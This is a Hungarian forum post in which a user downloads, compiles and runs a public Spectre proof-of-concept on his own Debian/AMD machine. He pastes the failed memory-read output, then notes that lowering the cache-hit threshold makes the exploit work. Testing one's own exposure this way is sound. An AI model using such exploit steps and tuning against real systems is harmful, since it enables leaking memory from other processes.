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TCH  (statz) Főfasz
#1, Főfasz (10466)
5255 | #477a | ^ | Idézet | Thu, 11 Jan 2018 10:13:05 +01
94.21.*.* Linux x86 Opera Classic Hungary *.pool.digikabel.hu
root@Csabi:~# cd /tmp
root@Csabi:/tmp# lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 8.10 (jessie)
Release:        8.10
Codename:       jessie
root@Csabi:/tmp# uname -a
Linux Csabi 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
root@Csabi:/tmp# cat /proc/cpuinfo | grep "model name"
model name      : AMD FX(tm)-6300 Six-Core Processor
model name      : AMD FX(tm)-6300 Six-Core Processor
model name      : AMD FX(tm)-6300 Six-Core Processor
model name      : AMD FX(tm)-6300 Six-Core Processor
model name      : AMD FX(tm)-6300 Six-Core Processor
model name      : AMD FX(tm)-6300 Six-Core Processor
root@Csabi:/tmp# wget https://raw.githubusercontent.com/Eugnis/spectre-attack/master/Source.c
--2018-01-11 10:06:01--  https://raw.githubusercontent.com/Eugnis/spectre-attack/master/Source.c
raw.githubusercontent.com (raw.githubusercontent.com) feloldása…
Csatlakozás a következőhöz: raw.githubusercontent.com (raw.githubusercontent.com)[]:443… kapcsolódva.
HTTP kérés elküldve, várakozás válaszra… 200 OK
Hossz: 4823 (4,7K) [text/plain]
Mentés ide: „Source.c”

Source.c            100%[=====================>]   4,71K  --.-KB/s  idő 0s

2018-01-11 10:06:01 (45,6 MB/s) -- „Source.c” mentve [4823/4823]

root@Csabi:/tmp# gcc -std=c99 Source.c -o Test
root@Csabi:/tmp# chmod +x Test
root@Csabi:/tmp# ./Test
Putting 'The Magic Words are Squeamish Ossifrage.' in memory, address 0x400c08
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdff948... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff949... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94a... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94b... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94c... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94e... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff94f... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff950... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff951... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff952... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff953... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff954... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff955... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff956... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff957... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff958... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff959... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95a... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95b... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95c... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95e... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff95f... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff960... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff961... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff962... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff963... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff964... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff965... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff966... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff967... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff968... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff969... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96a... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96b... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96c... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96d... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96e... Success: 0xFF='?' score=0
Reading at malicious_x = 0xffffffffffdff96f... Success: 0xFF='?' score=0
A jelek szerint én nem vagyok érintett, pedig semmit sem frissítettem még. Ezek szerint az AMD-nek igaza volt, hogy ha a BPF JIT ki van kapcsolva, akkor a Spectre sem működik, nem csak a Meltdown.

Sz*rk: Zsugabubus posztja, rámutatott, hogy ha a CACHE_HIT_THRESHOLD makrót 120-ra állítom, akkor sajnos itt is működik...

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OS for MC680x0 | OS for PPC | OS for Sparc64 | besztofbégéaefcé | CSÉNDZSLOG | WebToolz | DDG Shit Filter | Google Shit Filter | Progz | Fast CSS Box | Browser | OS | Agent | Statisztika | BBCode
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Név: (max 255 byte)

Email: (max 255 byte) Nem kötelező!

Üzenet: (max 65536 kar.) 65536-0=65536

crap_vkn v4.34.0 by TCH
Thx to saxus for the escaped string decoder function (PHP), the realIP function (PHP) & the SQL handle layer (PHP), to thookerov for the int_divide function (PHP), to Jeff Anderson for the getSelText function (JS), to Alex King for the insertAtCursor function (JS), Flood3r for the new CSS styles, Pety for the spamprotection idea and some design and comfort ideas, MaxMind for the IP2Country database, famfamfam for the flags of countries and an unknown PHP programmer for the removeAccents function.

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